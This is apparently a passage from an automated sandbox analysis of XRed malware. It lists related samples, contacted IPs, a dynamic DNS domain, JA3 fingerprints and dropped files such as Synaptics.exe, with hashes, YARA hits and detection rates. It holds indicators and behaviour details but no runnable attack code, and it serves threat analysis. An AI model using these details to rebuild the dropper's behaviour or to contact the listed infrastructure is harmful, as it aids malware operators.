	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	XRed	Browse	13.107.246.45
	file.exe	Get hash	malicious	Xmrig	Browse	13.107.246.45
freedns.afraid.org	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AWKNET-LLCUS	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252
	file.exe	Get hash	malicious	XRed	Browse	69.42.215.252

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	XRed	Browse	216.58.212.174 142.250.185.65
	file.exe	Get hash	malicious	XRed	Browse	216.58.212.174 142.250.185.65
	file.exe	Get hash	malicious	XRed	Browse	216.58.212.174 142.250.185.65
	file.exe	Get hash	malicious	XRed	Browse	216.58.212.174 142.250.185.65
	file.exe	Get hash	malicious	XRed	Browse	216.58.212.174 142.250.185.65
	file.exe	Get hash	malicious	XRed	Browse	216.58.212.174 142.250.185.65
	file.exe	Get hash	malicious	XRed	Browse	216.58.212.174 142.250.185.65
	file.exe	Get hash	malicious	XRed	Browse	216.58.212.174 142.250.185.65
	file.exe	Get hash	malicious	XRed	Browse	216.58.212.174 142.250.185.65

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\Synaptics\RCX1D61.tmp	file.exe	Get hash	malicious	XRed	Browse
	LisectAVT_2403002A_282.exe	Get hash	malicious	XRed	Browse
	LisectAVT_2403002A_282.exe	Get hash	malicious	XRed	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.5700810731231707
Encrypted:	false
SSDEEP:	3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5:	573220372DA4ED487441611079B623CD
SHA1:	8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256:	BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512:	F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

C:\ProgramData\Synaptics\RCX1D61.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	771584
Entropy (8bit):	6.636362882247521
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IFr:ansJ39LyjbJkQFMhmC+6GD92
MD5:	B753207B14C635F29B2ABF64F603570A
SHA1:	8A40E828224F22361B09494A556A20DB82FC97B9
SHA-256:	7F16106F3354A65FC749737905B77DF7BBEFA28BF8BBC966DC1F8C53FA4660F2
SHA-512:	0DD32803B95D53BADD33C0C84DF1002451090FF5F74736680E3A53A0BFC0E723EEE7D795626BC10A1FB431DE7E6E276C5A66349EF385A8B92B48425B0BDD036F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX1D61.tmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX1D61.tmp, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_282.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_282.exe, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15745536
Entropy (8bit):	7.978966950180418
Encrypted:	false
SSDEEP:	393216:EU5lptVYmfr7yBG/4WoI+j6LTinXKSf0fzTDvD:v7pttD7yBG/uljIinXj0fX
MD5:	7E33585D157419E39FB4D232C9F0C5DC
SHA1:	1CF4864A9B009E12534CC299C14466F2B2C9CEA3
SHA-256:	027A4BAF9864A23FE09D99BE3A6F83D1841E47AAC2F94D313D2580E84D1B1B39
SHA-512:	3ABCB07CDDE6D8014149E5AD9C07F1AFAA88D4A8FB85A67E6F0514EC613ADA145DDA81713DD96BA0A91F056D65919820B24C6BF2232D59E7FDC6D27F86B01036
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..........................................@..............................................@..............................B......x....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...x...........................@..P....................................@..P........................................................................................................................................

C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\ENSvpt6.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.261979349265974
Encrypted:	false
SSDEEP:	24:GgsF+0BvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK++v+pAZewRDK4mW
MD5:	AAE926673CFC06DF18386BAED832E7E6
SHA1:	AF0915725623EF1C9464AD0E45CD569DA50D8E83
SHA-256:	528BC6EDC8C6EC933E89760DDBD57553400C18146526196332EA25B37DCDC728
SHA-512:	33B5232C9378DC37CF8E84857A55327A63A5E5B15E282A23523FCAD4E48997C2E16F545EFE6937CDCED7B13D77B0E4FEB9709535081F397C17666F3B74FB6402
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6sjdrC1ZvT_vNJaMkQrnsQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20250102144032.log

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4959
Entropy (8bit):	5.440811034671566
Encrypted:	false
SSDEEP:	96:tHQV91p5OeZuo7D24fGhiInlQt131Yc1Yi1YJ1Y91Y61YQ1Y/1YB0FbFoHoqAoGG:tw31p5D0offGhiInl431Yc1Yi1YJ1Y9n
MD5:	19FF691A549C819BCB50C15F8A3AF902
SHA1:	5D33CB5D1390EA8E1ABB70F45158C937F80F2984
SHA-256:	945320AE161357780E49AFDB84A464F2C0BFF29367EEDB6B0A1A81D7569B4ACE
SHA-512:	F5339B03C7B4190C27E63D132B44E571FCAA6D9C3B822DAC2C92D0503027A9A53615FD86C44DF8A3B339A1367E7D80C95E7C58ED3B5E402B7F2AD7C2AE767A4B
Malicious:	false
Preview:	[15A8:0DA8][2025-01-02T14:40:31]i001: Burn v3.10.4.4718, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe..[15A8:0DA8][2025-01-02T14:40:31]i009: Command Line: '-burn.clean.room=C:\Users\user\Desktop\._cache_file.exe -burn.filehandle.attached=576 -burn.filehandle.self=572'..[15A8:0DA8][2025-01-02T14:40:31]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\Desktop\._cache_file.exe'..[15A8:0DA8][2025-01-02T14:40:31]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\Desktop\'..[15A8:0DA8][2025-01-02T14:40:32]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20250102144032.log'..[15A8:0DA8][2025-01-02T14:40:32]i000: Setting string variable 'WixBundleName' to value 'Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508'..[15A8:0DA8][2025-01-02T14:40:32]i000: Setting string variabl

C:\Users\user\AppData\Local\Temp\mAsbqr4h.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\AppData\Local\Temp\~$mAsbqr4h.xlsm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:KVC+cAmltV:KVC+cR
MD5:	9C7132B2A8CABF27097749F4D8447635
SHA1:	71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
SHA-256:	7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
SHA-512:	333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
Malicious:	false
Preview:	.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\~DFC577DADA6953CA4C.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.746897789531007
Encrypted:	false
SSDEEP:	192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
MD5:	7426F318A20A187D88A6EC88BBB53BAF
SHA1:	4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
SHA-256:	9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
SHA-512:	EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\._cache_file.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	14974024
Entropy (8bit):	7.995870107606645
Encrypted:	true
SSDEEP:	393216:q5lptVYmfr7yBG/4WoI+j6LTinXKSf0fzTDv8:q7pttD7yBG/uljIinXj0fQ
MD5:	F0248D477E74687C5619AE16498B13D4
SHA1:	9ED4B091148C9B53F66B3F2C69BE7E60E74C486A
SHA-256:	B6C82087A2C443DB859FDBEAAE7F46244D06C3F2A7F71C35E50358066253DE52
SHA-512:	0C373B06FFE84F3E803831E90F22D7D73304E47A47839DB614F63399FF1B7FCF33153BF3D23998877C96D2A75E316291A219FDD12358CA48928526284B802591
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p............@..............................................;..........@:...B...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

C:\Users\user\Documents\DVWHKMNFNN\YPSIACHYXW.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\Documents\DVWHKMNFNN\~$YPSIACHYXW.xlsx

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:KVC+cAmltV:KVC+cR
MD5:	9C7132B2A8CABF27097749F4D8447635
SHA1:	71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
SHA-256:	7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
SHA-512:	333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
Malicious:	false
Preview:	.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\DVWHKMNFNN\~$cache1

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	771584
Entropy (8bit):	6.636362882247521
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IFr:ansJ39LyjbJkQFMhmC+6GD92
MD5:	B753207B14C635F29B2ABF64F603570A
SHA1:	8A40E828224F22361B09494A556A20DB82FC97B9
SHA-256:	7F16106F3354A65FC749737905B77DF7BBEFA28BF8BBC966DC1F8C53FA4660F2
SHA-512:	0DD32803B95D53BADD33C0C84DF1002451090FF5F74736680E3A53A0BFC0E723EEE7D795626BC10A1FB431DE7E6E276C5A66349EF385A8B92B48425B0BDD036F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1028\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	18127
Entropy (8bit):	4.036737741619669
Encrypted:	false
SSDEEP:	192:xaz+aCQbjdBCLCgfvtfLEmmVxJzLKLIW7cBFCoSM0fvJ93eyryH1MqG1xcRY/c5f:seh/IMHexG4q2
MD5:	B7F65A3A169484D21FA075CCA79083ED
SHA1:	5DBFA18928529A798FF84C14FD333CB08B3377C0
SHA-256:	32585B93E69272B6D42DAC718E04D954769FE31AC9217C6431510E9EEAD78C49
SHA-512:	EDA2F946C2E35464E4272B1C3E4A8DC5F17093C05DAB9A685DBEFD5A870B9D872D8A1645ED6F5B9A72BBB2A59D22DFA58FBF420F6440278CCBE07B6D0555C283
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset134 SimSun;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT \f1\'dc\'9b\'f3\'77\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\f0\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0\f1\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'ca\'c7\'d9\'46\'d3\'c3\'91\'f4\'c5\'63\f0 Microsoft Corporation (\f1\'bb\'f2\'c6\'e4\'ea\'50\'82\'53\'c6\'f3\'98\'49\'a3\'ac\'d2\'95\'d9\'46\'d3\'c3\'91\'f4\'cb\'f9\'be\'d3\'d7\'a1\'b5\'c4\'b5\'d8\'fc\'63\'b6\'f8\'b6\'a8\f0 ) \f1\'d6\'ae\'e9\'67\'b3\'c9\'c1\'a2\'b5\'c4\'ba\'cf\'bc\'73\'a1\'a3\'cb\'fb\'82\'83\'df\'6d\'d3\'c3\'ec\'b6\'c9\'cf\'ca\'f6\'dc\'9b\'f3\'77\'a3\'ac\'b1\'be\'ca\'da\'99\'e0\'97\'6c\'bf\'ee\'d2\'e0\'df\'6d\'d3\'c3\'ec\'b6\'c8\'ce\'ba\'ce\f0 Microsoft \f1\'b7\'fe\'84\'d5\'bb\'f2\'b1\'be\'dc\'9b\'f3\'77\'d6\'ae\'b8\'fc\'d0\'c2\'a3

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1028\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2980
Entropy (8bit):	6.163758160900388
Encrypted:	false
SSDEEP:	48:c5DiTlOtMes9T/JhDXsA9EHSniarRFeOrw8N3mZNNTN2N08CEjMUWFPmDlTKJKy2:uDiTlFrDDsA9tfHP8+8nhM0WamzqDFqD
MD5:	472ABBEDCBAD24DBA5B5F5E8D02C340F
SHA1:	974F62B5C2E149C3879DD16E5A9DBB9406C3DB85
SHA-256:	8E2E660DFB66CB453E17F1B6991799678B1C8B350A55F9EBE2BA0028018A15AD
SHA-512:	676E29378AAED25DE6008D213EFA10D1F5AAD107833E218D71F697E728B7B5B57DE42E7A910F121948D7B1B47AB4F7AE63F71196C747E8AE2B4827F754FC2699
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">....</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - ................. ......................../passive \| /quiet - .... UI ........... UI.... ........... UI ........../norestart - ................UI ............./log log.txt - .........

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1029\license.rtf

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
Category:	dropped
Size (bytes):	13053
Entropy (8bit):	5.125552901367032
Encrypted:	false
SSDEEP:	192:TKwfs7OUpXLa5HEXQwNCNvZSjotXxiwH++3kamdEj6ZDbugDHgbGNlv6NbrYGY9x:Lfs7c5DRH0aHmJGpafU0AliwGra2
MD5:	B408556A89FCE3B47CD61302ECA64AC9
SHA1:	AAC1CDAF085162EFF5EAABF562452C93B73370CB
SHA-256:	21DDCBB0B0860E15FF9294CBB3C4E25B1FE48619210B8A1FDEC90BDCDC8C04BC
SHA-512:	BDE33918E68388C60750C964CDC213EC069CE1F6430C2AA7CF1626E6785C7C865094E59420D00026918E04B9B8D19FA22AC440F851ADC360759977676F8891E7
Malicious:	false
Preview:	{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 LICEN\f1\'c8N\f0\'cd PODM\'cdNKY PRO SOFTWARE SPOLE\f1\'c8NOSTI MICROSOFT\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Tyto licen\f1\'e8n\f0\'ed podm\'ednky p\f1\'f8edstavuj\f0\'ed smlouvu mezi spole\f1\'e8nost\f0\'ed Microsoft Corporation (nebo n\f1\'eckterou z\~jej\f0\'edch afilac\'ed v\~z\'e1vislosti na tom, kde bydl\'edte) a\~v\'e1mi. Vztahuj\'ed se na v\'fd\f1\'9ae uveden\f0\'fd software. Podm\'ednky se rovn\f1\'ec\'9e vztahuj\f0\'ed na jak\'e9koli slu\f1\'9eby Microsoft nebo aktualizace pro software, pokud se na slu\'9eby nebo aktualizace nevztahuj\f0\'ed odli\f1\'9an\f0\'e9 podm\'ednky.\par..\b DODR\f1\'8e\f0\'cdTE-LI TYTO

C:\Windows\Temp\{4F96F7E1-959C-4DE6-ABC0-2037B4048CBF}\.ba\1029\thm.wxl

Download File

Process:	C:\Windows\Temp\{6972753C-2212-46FB-8B4A-2572DDD0CA77}\.cr\._cache_file.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3333
Entropy (8bit):	5.370651462060085
Encrypted:	false
SSDEEP:	48:c5DiTlOtesM6H2hDdxHOjZxsaIIy3Iy5sDMN3mkNFN7NwcfiPc3hKPnWZLF0hKqZ:uDiTlVxxHOy/9xXfpZJYnL8xK2S
MD5:	16343005D29EC431891B02F048C7F581
SHA1:	85A14C40C482D9351271F6119D272D19407C3CE9
SHA-256:	07FB3EC174F25DFBE532D9D739234D9DFDA8E9D34F01FE660C5B4D56989FA779
SHA-512:	FF1AE9C21DCFB018DD4EC82A6D43362CB8C591E21F45DD1C25955D83D328B57C8D454BBE33FBC73A70DADF1DFB3AE27502C9B3A8A3FF2DA97085CA0D9A68AB03
Malicious:	false
